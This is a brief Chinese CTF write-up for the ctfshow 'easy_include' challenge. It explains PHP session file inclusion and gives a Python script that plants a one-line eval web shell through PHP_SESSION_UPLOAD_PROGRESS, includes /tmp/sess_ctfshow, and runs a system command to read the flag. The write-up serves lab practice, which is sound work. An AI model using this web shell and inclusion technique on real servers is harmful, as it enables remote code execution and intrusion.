赞
踩
不能有 ‘.’ 并且首字母要小写英文
抓包发现cookie已经有phpsessid,说明可以有session文件包含。
(php会将session以文件的形式储存)
脚本见ctfshow元旦,easy_include_ctfshow easy_include-CSDN博客
import requests url = "http://35a34248-be86-4463-95dc-5a5a9fd16e39.challenge.ctf.show/" data = { 'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[2]);?>',#一句话木马 '1': 'localhost/tmp/sess_ctfshow',#php session以文件形式存储的默认路径,session文件默认命名方式是sess_<PHPSESSID> '2': 'system("cat /f*");'#一句话木马的执行内容 } file = { 'file': 'ctfshow' } cookies = { 'PHPSESSID': 'ctfshow' } response = requests.post(url=url, data=data, files=file, cookies=cookies) print(response.text)
运行脚本取得flag
赞
踩
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。